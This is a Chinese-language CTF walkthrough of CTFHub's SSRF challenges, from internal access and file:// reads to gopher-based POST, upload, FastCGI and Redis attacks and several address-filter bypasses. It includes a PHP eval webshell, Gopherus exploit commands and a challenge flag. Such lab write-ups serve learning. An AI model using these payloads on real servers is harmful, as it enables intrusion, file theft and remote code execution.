第一题,内网访问
一,打开web/ssrf/内网访问
二,进入页面什么都没有查看一下上一步给的参数
三,输入http://127.0.0.1/flag.php回车显示flag
四,然后复制提交(恭喜通关)
第二题,伪协议读取文件
一,打开web/ssrf/伪协议读取文件
二,进入页面什么都没有
三,输入file:///var/www/html/flag.php然后查看源代码
四,已经有flag了返回题目点击提交(成功)
第三题,端口扫描
一,打开web/ssrf/端口扫描
这关需要查看端口范围需要用到BP
二,抓到包然后发送lntruder
三,先点击清除payload然后放到8000上边点添加payload
四,然后点到payload
输入8000-9000然后开始攻击
五,点击长度会发现8422和其他的长度不一样
然后点击响应
这个就是我们所需要的
六,返回到题目页面输入ctfhub{13bc480ac2b61c71d9a53eb0}
恭喜通过这一关
第四题,POST请求
一,打开web/ssrf/POST请求
二,在url后面输入
http://127.0.0.1/flag.php出现输入窗口
三,查看源代码
四,返回有输入框的页面输入0c6c52527a028e69c676f3e4b4901d20-->然后打开BP抓包
五,添加
在第一行添加gopher://127.0.0.1:80/_
在第二行都删除然后添加127.0.0.1:80
六,复制然后编码
编码后复制下来然后打开计算机页面创建一个文本复制进去把%0A替换%0D%0A
七,在进行二次编码
八,然后返回我们做题的页面输入我们所弄的编码
复制下面的flag
九,提交flag,通过!
第五题,上传文件
一,打开web/ssrf/上传文件
二,在url后面输入
http://127.0.0.1/flag.php出现浏览...未选择文件.
三,F12打开源代码源码中需手动添加提交框并提交文件大小大于0的文件并抓包.<input type="submit" name="submit">
四,给桌面创造一个1.php里面内容写上<?php @eval($_POST['cmd']);?>提交的时候打开BP抓包
五,添加
在第一行添加gopher://127.0.0.1:80/_
在第二行都删除然后添加127.0.0.1:80
六,复制然后编码
编码后复制下来然后打开计算机页面创建一个文本复制进去把%0A替换%0D%0A
七,在进行二次编码
八,然后返回我们做题的页面输入我们所弄的编码
复制下面的flag
九,提交flag,通过!
第六题FastCGl协议
一,打开web/ssrf/FastCGl协议
二,打开kali准备一句话木马并构造要执行的终端命令:对一句话木马进行base64编码且写入到名为shell.php的文件中。
三,将生成的payload再进行第二次编码即可.访问上传..
四,复制下面的话然后进行编码
五,在做题页面输入成功后的编码
在输入shell.php
六,打开中国菜刀然后输入进去
进去之后点击根目录然后往下滑
七,提交flag,通过!
第七题Redis协议
一,打开web/ssrf/Redis协议
二,打开kali
输入python2 gopherus.py --exploit redis
三,复制下面的话然后进行编码
四,在做题页面输入成功后的编码
一直在转圈圈
我们就直接输入shell.php叭
五,打开中国菜刀然后输入进去
进去之后点击根目录然后往下滑
六,提交flag,通过!
第八题URL Bypass
一,打开web/ssrf/URL Bypass
二,尝试输入http://127.0.0.1/flag.php结果没反应
看到题目要求必须包含http://notfound.ctfhub.com
我们在尝试http://notfound.ctfhub.com@127.0.0.1/flag.php
三,提交flag,通过!
第九题数字IP Bypass
一,打开web/ssrf/数字IP Bypass
二,尝试输入一下
http://127.0.0.1/flag.php
根据提示说不能用127.我们来转换一下
发现点也不能用我们用0代替一下
回车
三,提交flag,通过!
第十题数字302跳转 Bypass
一,打开web/ssrf/302跳转 Bypass
二,尝试输入一下
http://127.0.0.1/flag.php
输入,localhost/flag.php
三,提交flag,通过!
第十一题DNS重绑定 Bypass
一,打开web/ssrf/DNS重绑定 Bypass
二,尝试输入一下
http://127.0.0.1/flag.php
还是和上一题一样的在输入,localhost/flag.php
三,提交flag,通过!
